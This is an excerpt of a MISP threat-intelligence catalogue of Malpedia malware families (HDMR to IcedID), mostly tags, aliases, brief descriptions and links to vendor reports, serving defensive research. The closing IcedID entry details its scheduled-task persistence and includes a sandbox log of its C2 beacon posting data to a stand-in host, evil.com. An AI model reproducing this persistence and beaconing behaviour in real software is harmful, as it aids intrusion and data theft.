https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/
https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter
https://securelist.com/apt-trends-report-q2-2019/91897/
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html
https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/
https://www.cyberbit.com/hawkeye-malware-keylogging-technique/
https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/
https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry
https://www.secureworks.com/research/threat-profiles/gold-galleon
http://www.secureworks.com/research/threat-profiles/gold-galleon
https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/
https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html
https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/

HDMR

HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: "!!! READ THIS !!!.hta".

The tag is: misp-galaxy:malpedia="HDMR"

HDMR is also known as:

GO-SPORT

Table 1944. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr
http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html
https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1

HDRoot

The tag is: misp-galaxy:malpedia="HDRoot"

HDRoot is also known as:

Table 1945. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hdroot
https://securelist.com/i-am-hdroot-part-1/72275/
https://securelist.com/i-am-hdroot-part-2/72356/

Helauto

The tag is: misp-galaxy:malpedia="Helauto"

Helauto is also known as:

Table 1946. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

HelloKitty (Windows)

The tag is: misp-galaxy:malpedia="HelloKitty (Windows)"

HelloKitty (Windows) is also known as:

KittyCrypt

Table 1947. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty
https://twitter.com/fwosar/status/1359167108727332868
https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html
https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/
https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/
https://unit42.paloaltonetworks.com/emerging-ransomware-groups/
https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks
https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/
https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html
https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/
https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/

Helminth

The tag is: misp-galaxy:malpedia="Helminth"

Helminth is also known as:

Table 1948. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth
https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability
https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

Heloag

The tag is: misp-galaxy:malpedia="Heloag"

Heloag is also known as:

Table 1949. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag
https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/

Herbst

The tag is: misp-galaxy:malpedia="Herbst"

Herbst is also known as:

Table 1950. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst
https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware

Heriplor

The tag is: misp-galaxy:malpedia="Heriplor"

Heriplor is also known as:

Table 1951. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor
https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

Hermes

The tag is: misp-galaxy:malpedia="Hermes"

Hermes is also known as:

Table 1952. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes
https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12
https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf
http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

Hermes Ransomware

The tag is: misp-galaxy:malpedia="Hermes Ransomware"

Hermes Ransomware is also known as:

Table 1953. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom
https://blog.dcso.de/enterprise-malware-as-a-service/
https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html
https://www.youtube.com/watch?v=9nuo-AGg4p4
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://dcso.de/2019/03/18/enterprise-malware-as-a-service
https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

HerpesBot

The tag is: misp-galaxy:malpedia="HerpesBot"

HerpesBot is also known as:

Table 1954. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes

HesperBot

The tag is: misp-galaxy:malpedia="HesperBot"

HesperBot is also known as:

Table 1955. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot

Hidden Bee

The tag is: misp-galaxy:malpedia="Hidden Bee"

Hidden Bee is also known as:

Table 1956. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee
https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/
https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/
https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/
https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/
https://www.freebuf.com/column/174581.html
https://www.freebuf.com/column/175106.html

HiddenTear

HiddenTear is an open source ransomware developed by a Turkish programmer and later released as proof of concept on GitHub. The malware generates a local symmetric key in order to encrypt a configurable folder (/test was the default one) and it sends it to a centralized C&C server. Due to its small payload it was used as real attack vector over email phishing campaigns. Variants are still used in attacks.

The tag is: misp-galaxy:malpedia="HiddenTear"

HiddenTear is also known as:

FuckUnicorn

Table 1957. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear
https://twitter.com/struppigel/status/950787783353884672
https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/
https://twitter.com/JAMESWT_MHT/status/1264828072001495041
https://github.com/goliate/hidden-tear
https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/
https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring
https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html

HideDRV

The tag is: misp-galaxy:malpedia="HideDRV"

HideDRV is also known as:

Table 1958. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
https://www.secureworks.com/research/threat-profiles/iron-twilight
http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf

HIGHNOON

According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.

The tag is: misp-galaxy:malpedia="HIGHNOON"

HIGHNOON is also known as:

Table 1959. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon
https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html
https://twitter.com/MrDanPerez/status/1159461995013378048
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://content.fireeye.com/apt-41/rpt-apt41/

HIGHNOON.BIN

The tag is: misp-galaxy:malpedia="HIGHNOON.BIN"

HIGHNOON.BIN is also known as:

Table 1960. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon_bin
https://content.fireeye.com/apt-41/rpt-apt41/

HIGHNOTE

The tag is: misp-galaxy:malpedia="HIGHNOTE"

HIGHNOTE is also known as:

ChyNode

Table 1961. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote
https://twitter.com/bkMSFT/status/1153994428949749761

HiKit

The tag is: misp-galaxy:malpedia="HiKit"

HiKit is also known as:

Table 1962. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit
https://www.secureworks.com/research/threat-profiles/bronze-keystone
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf
https://www.recordedfuture.com/hidden-lynx-analysis/
https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware
https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware

himan

The tag is: misp-galaxy:malpedia="himan"

himan is also known as:

Table 1963. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.himan
https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf

Himera Loader

The tag is: misp-galaxy:malpedia="Himera Loader"

Himera Loader is also known as:

Table 1964. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader
https://twitter.com/James_inthe_box/status/1260191589789392898

Hisoka

The tag is: misp-galaxy:malpedia="Hisoka"

Hisoka is also known as:

Table 1965. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hisoka
https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/

hive

Ransomware used in a double extortion scheme, first encountered June 2021.

The tag is: misp-galaxy:malpedia="hive"

hive is also known as:

Table 1966. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hive
https://www.ic3.gov/Media/News/2021/210825.pdf
https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/
https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals
https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

Hi-Zor RAT

The tag is: misp-galaxy:malpedia="Hi-Zor RAT"

Hi-Zor RAT is also known as:

Table 1967. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat
https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat

HLUX

The tag is: misp-galaxy:malpedia="HLUX"

HLUX is also known as:

Table 1968. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux

Holcus Installer (Adware)

Adware, tied to eGobbler and Nephos7 campaigns,

The tag is: misp-galaxy:malpedia="Holcus Installer (Adware)"

Holcus Installer (Adware) is also known as:

Table 1969. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus
https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0

homefry

a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.

The tag is: misp-galaxy:malpedia="homefry"

homefry is also known as:

Table 1970. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
https://www.secureworks.com/research/threat-profiles/bronze-mohawk

HookInjEx

The tag is: misp-galaxy:malpedia="HookInjEx"

HookInjEx is also known as:

Table 1971. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hookinjex
https://twitter.com/CDA/status/1014144988454772736
https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

HOPLIGHT

The tag is: misp-galaxy:malpedia="HOPLIGHT"

HOPLIGHT is also known as:

HANGMAN

Table 1972. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight
https://www.us-cert.gov/ncas/analysis-reports/ar20-045g
https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
https://www.us-cert.gov/ncas/analysis-reports/ar19-304a
https://www.secureworks.com/research/threat-profiles/nickel-academy
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf
https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea
https://securelist.com/apt-trends-report-q2-2019/91897/
https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/

Hopscotch

Hopscotch is part of the Regin framework.

The tag is: misp-galaxy:malpedia="Hopscotch"

Hopscotch is also known as:

Table 1973. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch
https://www.youtube.com/watch?v=VnzP00DZlx4

HorusEyes RAT

Remote Acess Tool Written in VB.NET.

The tag is: misp-galaxy:malpedia="HorusEyes RAT"

HorusEyes RAT is also known as:

Table 1974. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.horuseyes
https://github.com/arsium/HorusEyesRat_Public

Horus Eyes RAT

Warsaw trojan is a new banking trojan based on the Hours Eyes RAT core engine.

The tag is: misp-galaxy:malpedia="Horus Eyes RAT"

Horus Eyes RAT is also known as:

Table 1975. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.horus_eyes_rat
https://seguranca-informatica.pt/the-clandestine-horus-eyes-rat-from-the-underground-to-criminals-arsenal/

HOTCROISSANT

The tag is: misp-galaxy:malpedia="HOTCROISSANT"

HOTCROISSANT is also known as:

Table 1976. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant
https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/
https://www.us-cert.gov/ncas/analysis-reports/ar20-045d
https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

HOTWAX

HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.

The tag is: misp-galaxy:malpedia="HOTWAX"

HOTWAX is also known as:

Table 1977. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax
https://content.fireeye.com/apt/rpt-apt38
https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

Houdini

Houdini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.

The tag is: misp-galaxy:malpedia="Houdini"

Houdini is also known as:

Hworm
Jenxcus
Kognito
Njw0rm
WSHRAT
dinihou
dunihi

Table 1978. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini
https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37
https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html
https://www.youtube.com/watch?v=h3KLKCdMUUY
https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g
https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md
https://cofense.com/houdini-worm-transformed-new-phishing-attack/
https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated
https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/
https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/
https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/
https://www.youtube.com/watch?v=XDAiS6KBDOs
https://blogs.360.cn/post/APT-C-44.html
https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns
http://blog.morphisec.com/hworm-houdini-aka-njrat
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
http://blogs.360.cn/post/analysis-of-apt-c-37.html
https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks
https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt
https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html

HtBot

The tag is: misp-galaxy:malpedia="HtBot"

HtBot is also known as:

Table 1979. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot

htpRAT

The tag is: misp-galaxy:malpedia="htpRAT"

htpRAT is also known as:

Table 1980. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat
https://www.riskiq.com/blog/labs/htprat/

HTran

The tag is: misp-galaxy:malpedia="HTran"

HTran is also known as:

HUC Packet Transmit Tool

Table 1981. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.htran
https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf
https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/
https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html
https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/
https://www.secureworks.com/research/threat-profiles/bronze-mayfair
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://www.secureworks.com/research/htran
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

HttpBrowser

The tag is: misp-galaxy:malpedia="HttpBrowser"

HttpBrowser is also known as:

HttpDump

Table 1982. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser
https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.secureworks.com/research/threat-profiles/bronze-union
https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/

httpdropper

The tag is: misp-galaxy:malpedia="httpdropper"

httpdropper is also known as:

httpdr0pper

Table 1983. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper
https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf
http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html

http_troy

The tag is: misp-galaxy:malpedia="http_troy"

http_troy is also known as:

Table 1984. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy
https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf
http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html

Hunter Stealer

The tag is: misp-galaxy:malpedia="Hunter Stealer"

Hunter Stealer is also known as:

Table 1985. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter
https://twitter.com/3xp0rtblog/status/1324800226381758471

Hupigon

The tag is: misp-galaxy:malpedia="Hupigon"

Hupigon is also known as:

Table 1986. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hupigon
https://www.proofpoint.com/us/threat-insight/post/threat-actors-repurpose-hupigon-adult-dating-attacks-targeting-us-universities

Hussar

The tag is: misp-galaxy:malpedia="Hussar"

Hussar is also known as:

Table 1987. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hussar
https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

HxDef

The tag is: misp-galaxy:malpedia="HxDef"

HxDef is also known as:

HacDef
HackDef
HackerDefender

Table 1988. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hxdef
https://de.securelist.com/malware-entwicklung-im-ersten-halbjahr-2007/59574/

HyperBro

HyperBro is a RAT that has been observed to target primarily within the gambling industries, though it has been spotted in other places as well. The malware typically consists of 3 or more components: a) a genuine loader typically with a signed certification b) a malicious DLL loader loaded from the former component via DLL hijacking c) an encrypted and compressed blob that decrypts to a PE-based payload which has its C2 information hardcoded within.

The tag is: misp-galaxy:malpedia="HyperBro"

HyperBro is also known as:

Table 1989. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro
http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/
https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/
https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox
https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf
https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/
https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
https://www.secureworks.com/research/threat-profiles/bronze-union
https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf
https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia
https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf
https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html
https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html
https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/
https://securelist.com/luckymouse-hits-national-data-center/86083/

HyperSSL

Sideloader used by EmissaryPanda

The tag is: misp-galaxy:malpedia="HyperSSL"

HyperSSL is also known as:

FOCUSFJORD
Soldier
Sysupdate

Table 1990. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl
https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf
https://norfolkinfosec.com/emissary-panda-dll-backdoor/
https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx
https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf
https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf
https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf
https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html
https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf
https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html
https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

IcedID

Analysis Observations:

It sets up persistence by creating a Scheduled Task with the following characteristics:
Name: Update
Trigger: At Log on
Action: %LocalAppData%\$Example\\waroupada.exe /i
Conditions: Stop if the computer ceases to be idle.
The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
The filename remained static during analysis.
The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so: rundll32.exe kernel32,Sleep -s
Setup a local listener to proxy traffic on 127.0.0.1:50000

[Example Log from C2 Network Communication] [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1 [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196 [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)> [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2 [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'. [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258 [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html [2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

The tag is: misp-galaxy:malpedia="IcedID"

IcedID is also known as:

